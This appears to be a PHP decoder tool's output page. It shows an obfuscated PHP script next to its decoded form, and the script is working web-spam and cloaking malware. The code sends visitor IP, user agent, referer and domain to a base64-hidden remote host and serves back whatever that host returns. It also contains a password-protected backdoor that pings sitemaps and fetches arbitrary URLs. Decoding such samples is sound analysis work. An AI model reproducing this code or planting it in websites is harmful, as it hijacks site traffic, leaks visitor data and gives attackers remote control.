Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto vyyvr; ikcp5: $params["\x72\x65\161\x75\145\163\x74\x5f\165\x72\154"] = $_serve..
Decoded Output download
<?php goto vyyvr; ikcp5: $params["request_url"] = $_server["REQUEST_URI"]; goto h_ql0; butxw: $params["ip"] = isset($_server["HTTP_VIA"]) ? $_server["HTTP_X_FORWARDED_FOR"] : $_server["REMOTE_ADDR"]; goto zj834; mrx9o: $try = 0; goto mcmaq; n6z1p: $params["domain"] = isset($_server["HTTP_HOST"]) ? $_server["HTTP_HOST"] : $_server["SERVER_NAME"]; goto ikcp5; qlt_z: $params["protocol"] = isset($_server["HTTPS"]) ? "https://" : "http://"; goto zry6w; zarig: $api = base64_decode("aHR0cDovLzU0NjUtY2g0LXYyMDgubG92ZWJlZXZzLmxpdmU="); goto n6z1p; lzzyx: if (isset($_request["params"])) { $params["api"] = $api; print_r($params); die; } goto mrx9o; vyyvr: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, curlopt_url, $url); curl_setopt($ch, curlopt_useragent, "h"); curl_setopt($ch, curlopt_returntransfer, 1); curl_setopt($ch, curlopt_timeout, 30); curl_setopt($ch, curlopt_fresh_connect, true); if ($pf != '') { curl_setopt($ch, curlopt_post, 1); if (is_array($pf)) { curl_setopt($ch, curlopt_postfields, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } } goto zarig; zj834: if ($params["ip"] == null) { $params["ip"] = ''; } goto qlt_z; mcmaq: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, preg_split_no_empty); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto csiuu; nvutv: $params["agent"] = isset($_server["HTTP_USER_AGENT"]) ? $_server["HTTP_USER_AGENT"] : ''; goto butxw; ewzti: if (isset($_request["pwd163"])) { if (md5($_request["pwd163"] . "a!#_11AA") == "2f7a76f71ff9e24be7c0015ff9cb81d8") { if (isset($_get["sitemap"])) { $ping_url_format = "https://%s/ping?sitemap=%s%s/%s"; $ping_url = sprintf($ping_url_format, "www.google.co.jp", $params["protocol"], $params["domain"], $_get["sitemap"]); $ping_result = h($ping_url); if (strpos($ping_result, "google") != false) { die("success"); } else { die("failed"); } } if (isset($_request["l"]) && isset($_request["r"])) { $ping_result = h($_request["l"]); if (strpos($ping_result, $_request["r"]) != false) { die("success"); } else { die("failed"); } } } } goto lzzyx; zry6w: $params["language"] = isset($_server["HTTP_ACCEPT_LANGUAGE"]) ? $_server["HTTP_ACCEPT_LANGUAGE"] : ''; goto ewzti; h_ql0: $params["referer"] = isset($_server["HTTP_REFERER"]) ? $_server["HTTP_REFERER"] : ''; goto nvutv; csiuu: ?>
Did this file decode correctly?
Original Code
<?php goto vyyvr; ikcp5: $params["\x72\x65\161\x75\145\163\x74\x5f\165\x72\154"] = $_server["\x52\105\x51\125\105\x53\x54\x5f\125\x52\111"]; goto h_ql0; butxw: $params["\151\x70"] = isset($_server["\110\x54\124\x50\137\126\111\x41"]) ? $_server["\110\x54\x54\120\x5f\x58\137\106\117\x52\x57\101\x52\x44\105\x44\137\x46\117\x52"] : $_server["\122\105\x4d\117\124\105\x5f\101\x44\104\x52"]; goto zj834; mrx9o: $try = 0; goto mcmaq; n6z1p: $params["\x64\x6f\155\x61\x69\156"] = isset($_server["\110\x54\x54\x50\137\110\117\123\124"]) ? $_server["\x48\124\x54\x50\137\110\x4f\123\x54"] : $_server["\123\105\122\126\105\x52\x5f\x4e\x41\115\x45"]; goto ikcp5; qlt_z: $params["\160\162\157\164\157\143\x6f\x6c"] = isset($_server["\x48\x54\124\x50\x53"]) ? "\x68\164\x74\160\x73\x3a\x2f\x2f" : "\150\164\x74\x70\72\x2f\x2f"; goto zry6w; zarig: $api = base64_decode("\x61\110\x52\x30\x63\104\x6f\x76\114\172\125\x30\x4e\152\x55\x74\131\62\x67\x30\114\x58\131\x79\115\x44\x67\x75\x62\107\71\x32\x5a\127\x4a\x6c\x5a\130\x5a\x7a\x4c\x6d\x78\160\144\x6d\x55\x3d"); goto n6z1p; lzzyx: if (isset($_request["\160\x61\x72\x61\155\163"])) { $params["\x61\x70\x69"] = $api; print_r($params); die; } goto mrx9o; vyyvr: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, curlopt_url, $url); curl_setopt($ch, curlopt_useragent, "\x68"); curl_setopt($ch, curlopt_returntransfer, 1); curl_setopt($ch, curlopt_timeout, 30); curl_setopt($ch, curlopt_fresh_connect, true); if ($pf != '') { curl_setopt($ch, curlopt_post, 1); if (is_array($pf)) { curl_setopt($ch, curlopt_postfields, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } } goto zarig; zj834: if ($params["\x69\160"] == null) { $params["\x69\160"] = ''; } goto qlt_z; mcmaq: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("\57\134\174\x2f\163\x69", $content, -1, preg_split_no_empty); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto csiuu; nvutv: $params["\141\x67\145\156\164"] = isset($_server["\x48\x54\124\x50\137\125\123\x45\x52\137\101\x47\105\x4e\124"]) ? $_server["\110\124\x54\120\x5f\125\123\105\x52\x5f\x41\107\x45\116\x54"] : ''; goto butxw; ewzti: if (isset($_request["\160\x77\144\x31\66\63"])) { if (md5($_request["\160\x77\x64\x31\x36\x33"] . "\141\x21\43\137\61\61\101\101") == "\62\146\x37\x61\x37\x36\x66\67\61\x66\x66\71\x65\62\x34\x62\x65\x37\143\x30\x30\x31\65\146\x66\x39\143\142\x38\61\x64\70") { if (isset($_get["\163\x69\164\x65\155\141\x70"])) { $ping_url_format = "\x68\164\x74\x70\x73\72\57\x2f\45\163\57\x70\151\156\147\x3f\x73\151\164\x65\155\141\160\x3d\x25\x73\45\163\x2f\x25\x73"; $ping_url = sprintf($ping_url_format, "\167\x77\167\56\x67\x6f\157\x67\x6c\x65\56\x63\x6f\x2e\x6a\x70", $params["\160\x72\x6f\164\x6f\x63\x6f\x6c"], $params["\144\157\155\141\151\x6e"], $_get["\163\151\x74\x65\155\x61\x70"]); $ping_result = h($ping_url); if (strpos($ping_result, "\147\157\157\147\x6c\145") != false) { die("\x73\165\143\143\x65\163\x73"); } else { die("\146\141\151\154\x65\144"); } } if (isset($_request["\154"]) && isset($_request["\162"])) { $ping_result = h($_request["\154"]); if (strpos($ping_result, $_request["\162"]) != false) { die("\x73\x75\143\x63\145\x73\x73"); } else { die("\x66\x61\151\154\x65\x64"); } } } } goto lzzyx; zry6w: $params["\x6c\141\x6e\147\165\141\x67\145"] = isset($_server["\x48\124\124\x50\x5f\x41\x43\103\x45\x50\124\137\x4c\x41\x4e\x47\x55\101\107\x45"]) ? $_server["\110\x54\124\x50\x5f\x41\x43\x43\105\120\x54\137\x4c\x41\116\107\x55\101\107\105"] : ''; goto ewzti; h_ql0: $params["\162\x65\x66\x65\x72\x65\162"] = isset($_server["\110\x54\x54\120\x5f\122\x45\x46\105\x52\x45\x52"]) ? $_server["\110\x54\124\x50\x5f\x52\x45\106\x45\122\105\x52"] : ''; goto nvutv; csiuu: ?>
Function Calls
None |
Stats
MD5 | 2b991b86b696d30146a0875232192b02 |
Eval Count | 0 |
Decode Time | 51 ms |